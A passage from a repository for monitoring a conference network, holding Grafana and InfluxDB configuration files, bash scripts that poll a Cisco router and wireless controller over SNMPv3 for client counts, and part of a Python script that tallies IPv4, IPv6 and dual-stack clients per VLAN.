%(protocol)s://%(domain)s:%(http_port)s/ 40 | 41 | # Log web requests 42 | ;router_logging = false 43 | 44 | # the path relative working path 45 | ;static_root_path = public 46 | 47 | # enable gzip 48 | ;enable_gzip = false 49 | 50 | # https certs & key file 51 | ;cert_file = 52 | ;cert_key = 53 | 54 | #################################### Database #################################### 55 | [database] 56 | # Either "mysql", "postgres" or "sqlite3", it's your choice' 57 | ;type = sqlite3 58 | ;host = 127.0.0.1:3306 59 | ;name = grafana 60 | ;user = root 61 | ;password = 62 | 63 | # For "postgres" only, either "disable", "require" or "verify-full" 64 | ;ssl_mode = disable 65 | 66 | # For "sqlite3" only, path relative to data_path setting 67 | ;path = grafana.db 68 | 69 | #################################### Session #################################### 70 | [session] 71 | # Either "memory", "file", "redis", "mysql", "postgres", default is "file" 72 | ;provider = file 73 | 74 | # Provider config options 75 | # memory: not have any config yet 76 | # file: session dir path, is relative to grafana data_path 77 | # redis: config like redis server e.g. `addr=127.0.0.1:6379,pool_size=100,db=grafana` 78 | # mysql: go-sql-driver/mysql dsn config string, e.g. `user:password@tcp(127.0.0.1:3306)/database_name` 79 | # postgres: user=a password=b host=localhost port=5432 dbname=c sslmode=disable 80 | ;provider_config = sessions 81 | 82 | # Session cookie name 83 | ;cookie_name = grafana_sess 84 | 85 | # If you use session in https only, default is false 86 | ;cookie_secure = false 87 | 88 | # Session life time, default is 86400 89 | ;session_life_time = 86400 90 | 91 | #################################### Analytics #################################### 92 | [analytics] 93 | # Server reporting, sends usage counters to stats.grafana.org every 24 hours. 94 | # No ip addresses are being tracked, only simple counters to track 95 | # running instances, dashboard and error counts. It is very helpful to us. 96 | # Change this option to false to disable reporting. 97 | reporting_enabled = false 98 | 99 | # Google Analytics universal tracking code, only enabled if you specify an id here 100 | ;google_analytics_ua_id = 101 | 102 | #################################### Security #################################### 103 | [security] 104 | # default admin user, created on startup 105 | ;admin_user = admin 106 | 107 | # default admin password, can be changed before first start of grafana, or in profile settings 108 | ;admin_password = admin 109 | 110 | # used for signing 111 | ;secret_key = $key 112 | 113 | # Auto-login remember days 114 | ;login_remember_days = 7 115 | ;cookie_username = grafana_user 116 | ;cookie_remember_name = grafana_remember 117 | 118 | # disable gravatar profile images 119 | disable_gravatar = true 120 | 121 | # data source proxy whitelist (ip_or_domain:port seperated by spaces) 122 | ;data_source_proxy_whitelist = 123 | 124 | #################################### Users #################################### 125 | [users] 126 | # disable user signup / registration 127 | allow_sign_up = false 128 | 129 | # Allow non admin users to create organizations 130 | allow_org_create = false 131 | 132 | # Set to true to automatically assign new users to the default organization (id 1) 133 | ;auto_assign_org = true 134 | 135 | # Default role new users will be automatically assigned (if disabled above is set to true) 136 | ;auto_assign_org_role = Viewer 137 | 138 | # Background text for the user field on the login page 139 | login_hint = username 140 | 141 | #################################### Anonymous Auth ########################## 142 | [auth.anonymous] 143 | # enable anonymous access 144 | enabled = true 145 | 146 | # specify organization name that should be used for unauthenticated users 147 | org_name = Troopers 148 | 149 | # specify role for unauthenticated users 150 | org_role = Viewer 151 | 152 | #################################### Github Auth ########################## 153 | [auth.github] 154 | enabled = false 155 | ;allow_sign_up = false 156 | ;client_id = some_id 157 | ;client_secret = some_secret 158 | ;scopes = user:email,read:org 159 | ;auth_url = https://github.com/login/oauth/authorize 160 | ;token_url = https://github.com/login/oauth/access_token 161 | ;api_url = https://api.github.com/user 162 | ;team_ids = 163 | ;allowed_organizations = 164 | 165 | #################################### Google Auth ########################## 166 | [auth.google] 167 | enabled = false 168 | ;allow_sign_up = false 169 | ;client_id = some_client_id 170 | ;client_secret = some_client_secret 171 | ;scopes = https://www.googleapis.com/auth/userinfo.profile https://www.googleapis.com/auth/userinfo.email 172 | ;auth_url = https://accounts.google.com/o/oauth2/auth 173 | ;token_url = https://accounts.google.com/o/oauth2/token 174 | ;api_url = https://www.googleapis.com/oauth2/v1/userinfo 175 | ;allowed_domains = 176 | 177 | #################################### Auth Proxy ########################## 178 | [auth.proxy] 179 | enabled = false 180 | ;header_name = X-WEBAUTH-USER 181 | ;header_property = username 182 | ;auto_sign_up = true 183 | 184 | #################################### Basic Auth ########################## 185 | [auth.basic] 186 | enabled = true 187 | 188 | #################################### Auth LDAP ########################## 189 | [auth.ldap] 190 | enabled = false 191 | ;config_file = /etc/grafana/ldap.toml 192 | 193 | #################################### SMTP / Emailing ########################## 194 | [smtp] 195 | ;enabled = false 196 | ;host = localhost:25 197 | ;user = 198 | ;password = 199 | ;cert_file = 200 | ;key_file = 201 | ;skip_verify = false 202 | ;from_address = admin@grafana.localhost 203 | 204 | [emails] 205 | ;welcome_email_on_sign_up = false 206 | 207 | #################################### Logging ########################## 208 | [log] 209 | # Either "console", "file", default is "console" 210 | # Use comma to separate multiple modes, e.g. "console, file" 211 | mode = console, file 212 | 213 | # Buffer length of channel, keep it as it is if you don't know what it is. 214 | ;buffer_len = 10000 215 | 216 | # Either "Trace", "Debug", "Info", "Warn", "Error", "Critical", default is "Trace" 217 | level = Info 218 | 219 | # For "console" mode only 220 | [log.console] 221 | ;level = 222 | 223 | # For "file" mode only 224 | [log.file] 225 | ;level = 226 | # This enables automated log rotate(switch of following options), default is true 227 | ;log_rotate = true 228 | 229 | # Max line number of single file, default is 1000000 230 | ;max_lines = 1000000 231 | 232 | # Max size shift of single file, default is 28 means 1 << 28, 256MB 233 | ;max_lines_shift = 28 234 | 235 | # Segment log daily, default is true 236 | ;daily_rotate = true 237 | 238 | # Expired days of log file(delete after max days), default is 7 239 | ;max_days = 7 240 | 241 | #################################### AMPQ Event Publisher ########################## 242 | [event_publisher] 243 | ;enabled = false 244 | ;rabbitmq_url = amqp://localhost/ 245 | ;exchange = grafana_events 246 | 247 | ;#################################### Dashboard JSON files ########################## 248 | [dashboards.json] 249 | enabled = true 250 | ;path = /var/lib/grafana/dashboards 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /netmon_troopers/influxdb.conf: -------------------------------------------------------------------------------- 1 | ### Welcome to the InfluxDB configuration file. 2 | 3 | # Once every 24 hours InfluxDB will report anonymous data to m.influxdb.com 4 | # The data includes raft id (random 8 bytes), os, arch, version, and metadata. 5 | # We don't track ip addresses of servers reporting. This is only used 6 | # to track the number of instances running and the versions, which 7 | # is very helpful for us. 8 | # Change this option to true to disable reporting. 9 | reporting-disabled = true 10 | 11 | # we'll try to get the hostname automatically, but if it the os returns something 12 | # that isn't resolvable by other servers in the cluster, use this option to 13 | # manually set the hostname 14 | # hostname = "localhost" 15 | 16 | ### 17 | ### [meta] 18 | ### 19 | ### Controls the parameters for the Raft consensus group that stores metadata 20 | ### about the InfluxDB cluster. 21 | ### 22 | 23 | [meta] 24 | # Controls if this node should run the metaservice and participate in the Raft group 25 | enabled = true 26 | 27 | # Where the metadata/raft database is stored 28 | dir = "/var/lib/influxdb/meta" 29 | 30 | bind-address = "127.0.0.1:8088" 31 | retention-autocreate = true 32 | election-timeout = "1s" 33 | heartbeat-timeout = "1s" 34 | leader-lease-timeout = "500ms" 35 | commit-timeout = "50ms" 36 | cluster-tracing = false 37 | 38 | ### 39 | ### [data] 40 | ### 41 | ### Controls where the actual shard data for InfluxDB lives and how it is 42 | ### flushed from the WAL. "dir" may need to be changed to a suitable place 43 | ### for your system, but the WAL settings are an advanced configuration. The 44 | ### defaults should work for most systems. 45 | ### 46 | 47 | [data] 48 | # Controls if this node holds time series data shards in the cluster 49 | enabled = true 50 | 51 | dir = "/var/lib/influxdb/data" 52 | 53 | # The following WAL settings are for the b1 storage engine used in 0.9.2. They won't 54 | # apply to any new shards created after upgrading to a version > 0.9.3. 55 | max-wal-size = 104857600 # Maximum size the WAL can reach before a flush. Defaults to 100MB. 56 | wal-flush-interval = "10m" # Maximum time data can sit in WAL before a flush. 57 | wal-partition-flush-delay = "2s" # The delay time between each WAL partition being flushed. 58 | 59 | # These are the WAL settings for the storage engine >= 0.9.3 60 | wal-dir = "/var/lib/influxdb/wal" 61 | wal-logging-enabled = true 62 | data-logging-enabled = true 63 | 64 | # When a series in the WAL in-memory cache reaches this size in bytes it is marked as ready to 65 | # flush to the index 66 | # wal-ready-series-size = 25600 67 | 68 | # Flush and compact a partition once this ratio of series are over the ready size 69 | # wal-compaction-threshold = 0.6 70 | 71 | # Force a flush and compaction if any series in a partition gets above this size in bytes 72 | # wal-max-series-size = 2097152 73 | 74 | # Force a flush of all series and full compaction if there have been no writes in this 75 | # amount of time. This is useful for ensuring that shards that are cold for writes don't 76 | # keep a bunch of data cached in memory and in the WAL. 77 | # wal-flush-cold-interval = "10m" 78 | 79 | # Force a partition to flush its largest series if it reaches this approximate size in 80 | # bytes. Remember there are 5 partitions so you'll need at least 5x this amount of memory. 81 | # The more memory you have, the bigger this can be. 82 | # wal-partition-size-threshold = 20971520 83 | 84 | # Whether queries should be logged before execution. Very useful for troubleshooting, but will 85 | # log any sensitive data contained within a query. 86 | # query-log-enabled = true 87 | 88 | # Settings for the TSM engine 89 | 90 | # CacheMaxMemorySize is the maximum size a shard's cache can 91 | # reach before it starts rejecting writes. 92 | # cache-max-memory-size = 524288000 93 | 94 | # CacheSnapshotMemorySize is the size at which the engine will 95 | # snapshot the cache and write it to a TSM file, freeing up memory 96 | # cache-snapshot-memory-size = 26214400 97 | 98 | # CacheSnapshotWriteColdDuration is the length of time at 99 | # which the engine will snapshot the cache and write it to 100 | # a new TSM file if the shard hasn't received writes or deletes 101 | # cache-snapshot-write-cold-duration = "1h" 102 | 103 | # MinCompactionFileCount is the minimum number of TSM files 104 | # that need to exist before a compaction cycle will run 105 | # compact-min-file-count = 3 106 | 107 | # CompactFullWriteColdDuration is the duration at which the engine 108 | # will compact all TSM files in a shard if it hasn't received a 109 | # write or delete 110 | # compact-full-write-cold-duration = "24h" 111 | 112 | # MaxPointsPerBlock is the maximum number of points in an encoded 113 | # block in a TSM file. Larger numbers may yield better compression 114 | # but could incur a performance peanalty when querying 115 | # max-points-per-block = 1000 116 | 117 | ### 118 | ### [hinted-handoff] 119 | ### 120 | ### Controls the hinted handoff feature, which allows nodes to temporarily 121 | ### store queued data when one node of a cluster is down for a short period 122 | ### of time. 123 | ### 124 | 125 | [hinted-handoff] 126 | enabled = true 127 | dir = "/var/lib/influxdb/hh" 128 | max-size = 1073741824 129 | max-age = "168h" 130 | retry-rate-limit = 0 131 | 132 | # Hinted handoff will start retrying writes to down nodes at a rate of once per second. 133 | # If any error occurs, it will backoff in an exponential manner, until the interval 134 | # reaches retry-max-interval. Once writes to all nodes are successfully completed the 135 | # interval will reset to retry-interval. 136 | retry-interval = "1s" 137 | retry-max-interval = "1m" 138 | 139 | # Interval between running checks for data that should be purged. Data is purged from 140 | # hinted-handoff queues for two reasons. 1) The data is older than the max age, or 141 | # 2) the target node has been dropped from the cluster. Data is never dropped until 142 | # it has reached max-age however, for a dropped node or not. 143 | purge-interval = "1h" 144 | 145 | ### 146 | ### [cluster] 147 | ### 148 | ### Controls non-Raft cluster behavior, which generally includes how data is 149 | ### shared across shards. 150 | ### 151 | 152 | [cluster] 153 | shard-writer-timeout = "5s" # The time within which a remote shard must respond to a write request. 154 | write-timeout = "10s" # The time within which a write request must complete on the cluster. 155 | 156 | ### 157 | ### [retention] 158 | ### 159 | ### Controls the enforcement of retention policies for evicting old data. 160 | ### 161 | 162 | [retention] 163 | enabled = true 164 | check-interval = "30m" 165 | 166 | ### 167 | ### [shard-precreation] 168 | ### 169 | ### Controls the precreation of shards, so they are available before data arrives. 170 | ### Only shards that, after creation, will have both a start- and end-time in the 171 | ### future, will ever be created. Shards are never precreated that would be wholly 172 | ### or partially in the past. 173 | 174 | [shard-precreation] 175 | enabled = true 176 | check-interval = "10m" 177 | advance-period = "30m" 178 | 179 | ### 180 | ### Controls the system self-monitoring, statistics and diagnostics. 181 | ### 182 | ### The internal database for monitoring data is created automatically if 183 | ### if it does not already exist. The target retention within this database 184 | ### is called 'monitor' and is also created with a retention period of 7 days 185 | ### and a replication factor of 1, if it does not exist. In all cases the 186 | ### this retention policy is configured as the default for the database. 187 | 188 | [monitor] 189 | store-enabled = true # Whether to record statistics internally. 190 | store-database = "_internal" # The destination database for recorded statistics 191 | store-interval = "10s" # The interval at which to record statistics 192 | 193 | ### 194 | ### [admin] 195 | ### 196 | ### Controls the availability of the built-in, web-based admin interface. If HTTPS is 197 | ### enabled for the admin interface, HTTPS must also be enabled on the [http] service. 198 | ### 199 | 200 | [admin] 201 | enabled = true 202 | bind-address = "127.0.0.1:8083" 203 | https-enabled = false 204 | https-certificate = "/etc/ssl/influxdb.pem" 205 | 206 | ### 207 | ### [http] 208 | ### 209 | ### Controls how the HTTP endpoints are configured. These are the primary 210 | ### mechanism for getting data into and out of InfluxDB. 211 | ### 212 | 213 | [http] 214 | enabled = true 215 | bind-address = "127.0.0.1:8086" 216 | auth-enabled = true 217 | log-enabled = true 218 | write-tracing = false 219 | pprof-enabled = false 220 | https-enabled = false 221 | https-certificate = "/etc/ssl/influxdb.pem" 222 | 223 | 224 | ### 225 | ### [[graphite]] 226 | ### 227 | ### Controls one or many listeners for Graphite data. 228 | ### 229 | 230 | [[graphite]] 231 | enabled = false 232 | # database = "graphite" 233 | # bind-address = ":2003" 234 | # protocol = "tcp" 235 | # consistency-level = "one" 236 | # name-separator = "." 237 | 238 | # These next lines control how batching works. You should have this enabled 239 | # otherwise you could get dropped metrics or poor performance. Batching 240 | # will buffer points in memory if you have many coming in. 241 | 242 | # batch-size = 1000 # will flush if this many points get buffered 243 | # batch-pending = 5 # number of batches that may be pending in memory 244 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 245 | # udp-read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max. 246 | 247 | ## "name-schema" configures tag names for parsing the metric name from graphite protocol; 248 | ## separated by `name-separator`. 249 | ## The "measurement" tag is special and the corresponding field will become 250 | ## the name of the metric. 251 | ## e.g. "type.host.measurement.device" will parse "server.localhost.cpu.cpu0" as 252 | ## { 253 | ## measurement: "cpu", 254 | ## tags: { 255 | ## "type": "server", 256 | ## "host": "localhost, 257 | ## "device": "cpu0" 258 | ## } 259 | ## } 260 | # name-schema = "type.host.measurement.device" 261 | 262 | ## If set to true, when the input metric name has more fields than `name-schema` specified, 263 | ## the extra fields will be ignored. 264 | ## Otherwise an error will be logged and the metric rejected. 265 | # ignore-unnamed = true 266 | 267 | ### 268 | ### [collectd] 269 | ### 270 | ### Controls the listener for collectd data. 271 | ### 272 | 273 | [collectd] 274 | enabled = true 275 | bind-address = "127.0.0.1:25001" 276 | database = "collectd" 277 | typesdb = "/usr/share/collectd/types.db" 278 | # bind-address = "" 279 | # database = "" 280 | # typesdb = "" 281 | 282 | # These next lines control how batching works. You should have this enabled 283 | # otherwise you could get dropped metrics or poor performance. Batching 284 | # will buffer points in memory if you have many coming in. 285 | 286 | # batch-size = 1000 # will flush if this many points get buffered 287 | # batch-pending = 5 # number of batches that may be pending in memory 288 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 289 | # read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max. 290 | 291 | ### 292 | ### [opentsdb] 293 | ### 294 | ### Controls the listener for OpenTSDB data. 295 | ### 296 | 297 | [opentsdb] 298 | enabled = false 299 | # bind-address = ":4242" 300 | # database = "opentsdb" 301 | # retention-policy = "" 302 | # consistency-level = "one" 303 | # tls-enabled = false 304 | # certificate= "" 305 | # log-point-errors = true # Log an error for every malformed point. 306 | 307 | # These next lines control how batching works. You should have this enabled 308 | # otherwise you could get dropped metrics or poor performance. Only points 309 | # metrics received over the telnet protocol undergo batching. 310 | 311 | # batch-size = 1000 # will flush if this many points get buffered 312 | # batch-pending = 5 # number of batches that may be pending in memory 313 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 314 | 315 | ### 316 | ### [[udp]] 317 | ### 318 | ### Controls the listeners for InfluxDB line protocol data via UDP. 319 | ### 320 | ### [logstash] 321 | ### 322 | 323 | [[udp]] 324 | enabled = false 325 | # database = "udp" 326 | # retention-policy = "" 327 | 328 | # These next lines control how batching works. You should have this enabled 329 | # otherwise you could get dropped metrics or poor performance. Batching 330 | # will buffer points in memory if you have many coming in. 331 | 332 | # batch-size = 1000 # will flush if this many points get buffered 333 | # batch-pending = 5 # number of batches that may be pending in memory 334 | # batch-timeout = "1s" # will flush at least this often even if we haven't hit buffer limit 335 | # read-buffer = 0 # UDP Read buffer size, 0 means OS default. UDP listener will fail if set above OS max. 336 | 337 | # set the expected UDP payload size; lower values tend to yield better performance, default is max UDP size 65536 338 | # udp-payload-size = 65536 339 | 340 | ### 341 | ### [continuous_queries] 342 | ### 343 | ### Controls how continuous queries are run within InfluxDB. 344 | ### 345 | 346 | [continuous_queries] 347 | log-enabled = true 348 | enabled = true 349 | # run-interval = "1s" # interval for how often continuous queries will be checked if they need to run 350 | -------------------------------------------------------------------------------- /netmon_troopers/screenshots/grafana_dashboard_netmon_troopers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/netmon_troopers/screenshots/grafana_dashboard_netmon_troopers.png -------------------------------------------------------------------------------- /netmon_troopers/screenshots/grafana_dashboard_netmon_troopers_bandwidth.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/netmon_troopers/screenshots/grafana_dashboard_netmon_troopers_bandwidth.png -------------------------------------------------------------------------------- /netmon_troopers/scripts/cisco_arp_nbc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ROUTERIP="udp6:[$IPv6]" 3 | #ROUTERIP="$IPv4" 4 | ROUTERUSER="$user" 5 | ROUTERAUTH="$Passphrase" 6 | ROUTERPASS="$Passphrase" 7 | VLAN10="8" 8 | VLAN20="9" 9 | VLAN30="10" 10 | VLAN40="12" 11 | COUNTER="0" 12 | SNMPWALK=`which snmpwalk` 13 | 14 | #VLAN 20 is egal 15 | 16 | if [ "$1" = "arp_v10-old" ]; then 17 | data_vlan10=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.22.1.2.$VLAN10 |awk -F ': ' '{ print $2 }') 18 | #echo "VLAN10" 19 | echo $data_vlan10 20 | fi 21 | if [ "$1" = "arp_v10" ]; then 22 | data_vlan10=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN10.ipv4 |awk -F ': ' '{ print $2 }') 23 | #echo "VLAN10" 24 | echo $data_vlan10 25 | fi 26 | if [ "$1" = "arp_v30" ]; then 27 | data_vlan30=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.22.1.2.$VLAN30 |awk -F ': ' '{ print $2 }') 28 | #echo "VLAN30" 29 | echo $data_vlan30 30 | fi 31 | if [ "$1" = "arp_v20" ]; then 32 | data_vlan20=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.22.1.2.$VLAN20 |awk -F ': ' '{ print $2 }') 33 | #echo "VLAN20" 34 | echo $data_vlan20 35 | fi 36 | if [ "$1" = "arp_v40" ]; then 37 | data_vlan40=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN40.ipv4 |awk -F ': ' '{ print $2 }') 38 | #echo "VLAN40" 39 | echo $data_vlan40 40 | fi 41 | 42 | if [ "$1" = "nbc_v10" ]; then 43 | data_vlan10=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN10.ipv6 |awk -F ': ' '{ print $2 }') 44 | echo $data_vlan10 45 | fi 46 | if [ "$1" = "nbc_v30" ]; then 47 | data_vlan30=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN30.ipv6 |awk -F ': ' '{ print $2 }') 48 | echo $data_vlan30 49 | fi 50 | if [ "$1" = "nbc_v30_2" ]; then 51 | $SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN30.ipv6 52 | fi 53 | if [ "$1" = "nbc_v20" ]; then 54 | data_vlan20=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN20.ipv6 |awk -F ': ' '{ print $2 }') 55 | echo $data_vlan20 56 | fi 57 | if [ "$1" = "nbc_v40" ]; then 58 | data_vlan40=$($SNMPWALK -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP 1.3.6.1.2.1.4.35.1.4.$VLAN40.ipv6 |awk -F ': ' '{ print $2 }') 59 | echo $data_vlan40 60 | fi 61 | #$ROUTERINT1 #|awk -F ': ' '{ print $2 }' 62 | #snmpwalk -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP .1.3.6.1.2.1.4.29 #.1.6 #$ROUTERINT1 #|awk -F ': ' '{ print $2 }' 63 | #snmpwalk -v3 -u $ROUTERUSER -l authPriv -a sha -A $ROUTERAUTH -x aes -X $ROUTERPASS $ROUTERIP .1.3.6.1.2.1.4.30 #.1.6 #$ROUTERINT1 #|awk -F ': ' '{ print $2 }' 64 | -------------------------------------------------------------------------------- /netmon_troopers/scripts/cisco_wlc_bands.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | WLCIP="udp6:[$IPv6]" 3 | #WLCIP="$IPv4" 4 | WLCUSER="$user" 5 | WLCAUTH="$Passphrase" 6 | WLCPASS="$Passphrase" 7 | SNMPWALK=`which snmpwalk` 8 | 9 | 10 | 11 | 12 | clientsA=0 13 | clientsB=0 14 | clientsG=0 15 | clients24N=0 16 | clients5N=0 17 | #echo $SNMPWALK -v3 -u $WLCUSER -l authPriv -a sha -A $WLCAUTH -x aes -X $WLCPASS $WLCIP 1.3.6.1.4.1.14179.2.1.4.1.25 18 | data=$($SNMPWALK -v3 -u $WLCUSER -l authPriv -a sha -A $WLCAUTH -x aes -X $WLCPASS $WLCIP 1.3.6.1.4.1.14179.2.1.4.1.25|awk -F ': ' '{ print $2 }') 19 | for i in $data 20 | do 21 | if test $i -eq 1; 22 | then 23 | clientsA=$(echo $clientsA+1|bc) 24 | fi 25 | if test $i -eq 2; 26 | then 27 | clientsB=$(echo $clientsB+1|bc) 28 | fi 29 | if test $i -eq 3; 30 | then 31 | clientsG=$(echo $clientsG+1|bc) 32 | fi 33 | if test $i -eq 6; 34 | then 35 | clients24N=$(echo $clients24N+1|bc) 36 | fi 37 | if test $i -eq 7; 38 | then 39 | clients5N=$(echo $clients5N+1|bc) 40 | fi 41 | done 42 | echo $clientsA:$clientsB:$clientsG:$clients24N:$clients5N 43 | -------------------------------------------------------------------------------- /netmon_troopers/scripts/snmp_gw_wlc_troopers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import os 3 | import argparse 4 | 5 | def vlan10(clients="all"): 6 | #ARP 7 | arp_vlan10=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh arp_v10").read() 8 | tmp_table_vlan10_v4=(arp_vlan10).split() 9 | tmp_table_vlan10_v4.sort() 10 | table_vlan10_v4=set(tmp_table_vlan10_v4) 11 | tmp_c_vlan10_v4=len(table_vlan10_v4) 12 | 13 | #NBC" 14 | nbc_vlan10=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v10").read() 15 | tmp_table_vlan10_v6=(nbc_vlan10).split() 16 | tmp_table_vlan10_v6.sort() 17 | table_vlan10_v6=set(tmp_table_vlan10_v6) 18 | tmp_c_vlan10_v6=len(table_vlan10_v6) 19 | 20 | #dualstack 21 | setv4_vlan10=set(table_vlan10_v4) 22 | setv6_vlan10=set(table_vlan10_v6) 23 | table_vlan10_v4_v6=setv4_vlan10.intersection(setv6_vlan10) 24 | c_vlan10_v4_v6=len(table_vlan10_v4_v6) 25 | 26 | c_vlan10_v4 = tmp_c_vlan10_v4 - c_vlan10_v4_v6 27 | c_vlan10_v6 = tmp_c_vlan10_v6 - c_vlan10_v4_v6 28 | 29 | #clientv4 ; #clientv4_v6 ; #clientv6 30 | if clients == "all": 31 | return c_vlan10_v4 + c_vlan10_v4_v6 + c_vlan10_v6 32 | elif clients == "ipv4only": 33 | return c_vlan10_v4 34 | elif clients == "ipv6only": 35 | return c_vlan10_v6 36 | elif clients == "dualstack": 37 | return c_vlan10_v4_v6 38 | elif clients == "collectd": 39 | return [c_vlan10_v4, c_vlan10_v4_v6, c_vlan10_v6] 40 | 41 | #Both Public VLANs 42 | def vlan10_30(clients="all"): 43 | #ARP 44 | arp_vlan10=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh arp_v10").read() 45 | tmp_table_vlan10_v4=(arp_vlan10).split() 46 | tmp_table_vlan10_v4.sort() 47 | table_vlan10_v4=set(tmp_table_vlan10_v4) 48 | tmp_c_vlan10_v4=len(table_vlan10_v4) 49 | 50 | #NBC 51 | nbc_vlan10=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v10").read() 52 | nbc_vlan30=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v30").read() 53 | tmp_table_vlan10_30_v6=(nbc_vlan10).split() 54 | tmp_table_vlan30_v6=(nbc_vlan30).split() 55 | tmp_table_vlan10_30_v6.extend(tmp_table_vlan30_v6) 56 | tmp_table_vlan10_30_v6.sort() 57 | table_vlan10_30_v6=set(tmp_table_vlan10_30_v6) 58 | tmp_c_vlan10_30_v6=len(table_vlan10_30_v6) 59 | 60 | #dualstack 61 | setv4_vlan10=set(table_vlan10_v4) 62 | setv6_vlan10_30=set(table_vlan10_30_v6) 63 | table_vlan10_30_v4_v6=setv4_vlan10.intersection(setv6_vlan10_30) 64 | c_vlan10_30_v4_v6=len(table_vlan10_30_v4_v6) 65 | 66 | c_vlan10_v4 = tmp_c_vlan10_v4 - c_vlan10_30_v4_v6 67 | c_vlan10_30_v6 = tmp_c_vlan10_30_v6 - c_vlan10_30_v4_v6 68 | 69 | #clientv4 ; #clientv4_v6 ; #clientv6 70 | if clients == "all": 71 | return c_vlan10_v4 + c_vlan10_30_v4_v6 + c_vlan10_30_v6 72 | elif clients == "ipv4only": 73 | return c_vlan10_v4 74 | elif clients == "ipv6only": 75 | return c_vlan10_30_v6 76 | elif clients == "dualstack": 77 | return c_vlan10_30_v4_v6 78 | elif clients == "collectd": 79 | return [c_vlan10_v4, c_vlan10_30_v4_v6, c_vlan10_30_v6] 80 | 81 | 82 | def vlan20(clients="all"): 83 | #ARP 84 | arp_vlan20=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh arp_v20").read() 85 | tmp_table_vlan20_v4=(arp_vlan20).split() 86 | tmp_table_vlan20_v4.sort() 87 | table_vlan20_v4=set(tmp_table_vlan20_v4) 88 | tmp_c_vlan20_v4=len(table_vlan20_v4) 89 | 90 | #NBC 91 | nbc_vlan20=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v20").read() 92 | tmp_table_vlan20_v6=(nbc_vlan20).split() 93 | tmp_table_vlan20_v6.sort() 94 | table_vlan20_v6=set(tmp_table_vlan20_v6) 95 | tmp_c_vlan20_v6=len(table_vlan20_v6) 96 | 97 | #dualstack 98 | setv4_vlan20=set(table_vlan20_v4) 99 | setv6_vlan20=set(table_vlan20_v6) 100 | table_vlan20_v4_v6=setv4_vlan20.intersection(setv6_vlan20) 101 | c_vlan20_v4_v6=len(table_vlan20_v4_v6) 102 | 103 | c_vlan20_v4 = tmp_c_vlan20_v4 - c_vlan20_v4_v6 104 | c_vlan20_v6 = tmp_c_vlan20_v6 - c_vlan20_v4_v6 105 | 106 | #clientv4 ; #clientv4_v6 ; #clientv6 107 | if clients == "all": 108 | return c_vlan20_v4 + c_vlan20_v4_v6 + c_vlan20_v6 109 | elif clients == "ipv4only": 110 | return c_vlan20_v4 111 | elif clients == "ipv6only": 112 | return c_vlan20_v6 113 | elif clients == "dualstack": 114 | return c_vlan20_v4_v6 115 | elif clients == "collectd": 116 | return [c_vlan20_v4, c_vlan20_v4_v6, c_vlan20_v6] 117 | 118 | def vlan30(clients="all"): 119 | #ARP 120 | #should retrun 0 121 | arp_vlan30=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh arp_v30").read() 122 | tmp_table_vlan30_v4=(arp_vlan30).split() 123 | tmp_table_vlan30_v4.sort() 124 | table_vlan30_v4=set(tmp_table_vlan30_v4) 125 | tmp_c_vlan30_v4=len(table_vlan30_v4) 126 | 127 | #NBC 128 | nbc_vlan30=os.popen("sh /home/$user/scripts/cisco_arp_nbc.sh nbc_v30").read() 129 | tmp_table_vlan30_v6=(nbc_vlan30).split() 130 | tmp_table_vlan30_v6.sort() 131 | table_vlan30_v6=set(tmp_table_vlan30_v6) 132 | tmp_c_vlan30_v6=len(table_vlan30_v6) 133 | 134 | #dualstack 135 | setv4_vlan30=set(table_vlan30_v4) 136 | 